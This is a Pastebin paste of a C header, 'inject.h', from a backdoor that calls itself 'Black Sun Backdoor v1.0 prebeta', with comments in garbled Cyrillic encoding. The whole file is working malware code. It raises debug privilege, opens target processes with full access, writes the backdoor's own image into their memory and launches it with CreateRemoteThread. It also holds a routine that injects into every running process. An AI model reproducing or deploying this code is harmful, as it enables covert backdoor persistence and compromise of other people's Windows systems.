Advertisement
FlyFar

src/inject.h

May 17th, 2024
577
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.28 KB | Cybersecurity | 0 0
 1. /*
 2.  *  ---------------------------------------------------------------------
 3.  *         ____  _            _     _____            
 4.  *        |  _ \| |          | |   / ____|            
 5.  *        | |_) | | __ _  ___| | _| (___  _   _ _ __  
 6.  *        |  _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
 7.  *        | |_) | | (_| | (__|   < ____) | |_| | | | |
 8.  *        |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
 9.  *                 Black Sun Backdoor v1.0 prebeta        
 10.  *
 11.  *                          (x) Cytech 2007
 12.  *
 13.  *  ---------------------------------------------------------------------
 14.  *  [inject.h]
 15.  *      Ìîäóëü âíåäðåíèÿ â àäðåñíîå ïðîñòðàíñòâî ÷óæîãî ïðîöåññà
 16.  *      ñ ïîìîùüþ òåõíîëîãèè Process-Injection.
 17.  *  ---------------------------------------------------------------------
 18.  */
 19.  
 20.  
 21. // ------------------ [ Ïîëó÷åíèå PID ïî åãî èìåíè ïðîöåññà ] ------------------ //
 22.  
 23. static DWORD GetPIDbyName(LPTSTR p_Name)
 24. {
 25.     HANDLE m_Snap;
 26.  
 27.     PROCESSENTRY32 pe = { sizeof(pe) };
 28.     m_Snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
 29.  
 30.     if (m_Snap == INVALID_HANDLE_VALUE)
 31.     {
 32.         return 0;
 33.     }
 34.    
 35.     if (!Process32First(m_Snap, &pe))
 36.     {
 37.         return 0;
 38.     }
 39.    
 40.     do
 41.     {
 42.         if( !lstrcmpi(pe.szExeFile, p_Name))
 43.         {      
 44.             return pe.th32ProcessID;
 45.         }
 46.     } while (Process32Next(m_Snap, &pe));
 47.  
 48.     CloseHandle(m_Snap);
 49.  
 50.     return 0;
 51. }
 52.  
 53. // ------------------ [ Process Injection ] ------------------ //
 54.  
 55. static DWORD ProcessInject(HANDLE p_handle, DWORD (WINAPI f_Main)(LPVOID))
 56. {      
 57.  
 58.     PBYTE Buffer, pMem;
 59.     HANDLE hModule, hInjThread;
 60.     DWORD dwRead, dwSize, dwOldProt, wNumBytes;
 61.     IMAGE_DOS_HEADER ImageDosHeader;
 62.     IMAGE_OPTIONAL_HEADER32 ImageOptionalHeader;
 63.     BOOL bVProtect, bRPMem;
 64.     DWORD dwNumBytes;
 65.     dwRead = 0; dwSize = 0;
 66.    
 67.         hModule = GetModuleHandle(NULL);
 68.         dwSize = ((PIMAGE_OPTIONAL_HEADER)((LPVOID)((BYTE *)(BASEADDRESS) +
 69.             ((PIMAGE_DOS_HEADER)(BASEADDRESS))->e_lfanew
 70.                 + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER))))->SizeOfImage;
 71.  
 72.         Buffer = (PBYTE)VirtualAlloc(NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 73.  
 74.         if (Buffer == NULL)
 75.         {
 76.             return FALSE;
 77.         }
 78.        
 79.         bRPMem = ReadProcessMemory(GetCurrentProcess(), (LPCVOID)BASEADDRESS, (LPVOID)Buffer, dwSize, &dwRead);
 80.    
 81.         if (bRPMem == 0)
 82.         {
 83.             return FALSE;
 84.         }
 85.  
 86.         VirtualFreeEx(p_handle, (LPVOID)BASEADDRESS, dwRead, MEM_RELEASE);
 87.         pMem = (PBYTE)VirtualAllocEx(p_handle, (LPVOID)BASEADDRESS, dwRead, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 88.         VirtualProtectEx(p_handle, pMem , dwRead, PAGE_EXECUTE_READWRITE, &dwOldProt);
 89.    
 90.         if (!WriteProcessMemory(p_handle, pMem, Buffer, dwRead, &dwNumBytes))
 91.         {
 92.             return FALSE;
 93.         }
 94.         hInjThread = CreateRemoteThread(p_handle, 0, 0, &f_Main, NULL, 0, NULL);
 95.        
 96.         if (hInjThread == NULL)              
 97.         {                                    
 98.            return FALSE;
 99.         }
 100.     return TRUE;
 101. }
 102.  
 103. static DWORD StartProcInject(DWORD dwPid, LPTSTR p_Name, DWORD (WINAPI f_Main)(LPVOID))
 104. {
 105.     HANDLE hProcess;
 106.    
 107.     SetPrivilege(SE_DEBUG_PRIV, TRUE);
 108.    
 109.     if (dwPid == NULL)
 110.     {
 111.  
 112.             dwPid = GetPIDbyName(p_Name);
 113.             if(dwPid == 0)
 114.             {
 115.                 return FALSE;
 116.             }
 117.     }
 118.  
 119.     hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
 120.    
 121.     if (hProcess == NULL)
 122.     {
 123.         return FALSE;
 124.     }
 125.  
 126.     ProcessInject(hProcess, f_Main);
 127.  
 128.     if(ProcessInject == FALSE)
 129.     {
 130.         return FALSE;
 131.     }
 132.    
 133.     SetPrivilege(SE_DEBUG_PRIV, FALSE);
 134.   return TRUE;
 135. }
 136.  
 137. // ------------------ [ Èíæåêòèðîâàíèå âî âñå ïðîöåññû ] ------------------ //
 138.  
 139.  
 140. static DWORD WINAPI InjectAllProcesses(DWORD (WINAPI f_Main)(LPVOID))
 141. {
 142.     BOOL ret, flag = TRUE;
 143.     HANDLE m_Snap = INVALID_HANDLE_VALUE;
 144.     PROCESSENTRY32 pe = {sizeof(pe)};
 145.  
 146.     // SetPrivilege(SE_DEBUG_PRIV, TRUE);
 147.    
 148.     m_Snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
 149.  
 150.     if (m_Snap == INVALID_HANDLE_VALUE)
 151.     {
 152.         return NULL;
 153.     }
 154.     if (!Process32First(m_Snap, &pe))
 155.     {
 156.         return NULL;
 157.     }
 158.  
 159.      do {
 160.             if (pe.th32ProcessID == GetCurrentProcessId()) continue;
 161.             if (pe.th32ProcessID == GetPIDbyName(FIRSTINJPROC)) continue; // äâàæäû â FISTINJECTPROC íå èíæåêòèìñÿ!
 162.             ret = StartProcInject(pe.th32ProcessID, NULL, f_Main); 
 163.            
 164.         } while (Process32Next(m_Snap, &pe));
 165.  
 166.     // SetPrivilege(SE_DEBUG_PRIV, FALSE);
 167.  
 168.     return NULL;
 169. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement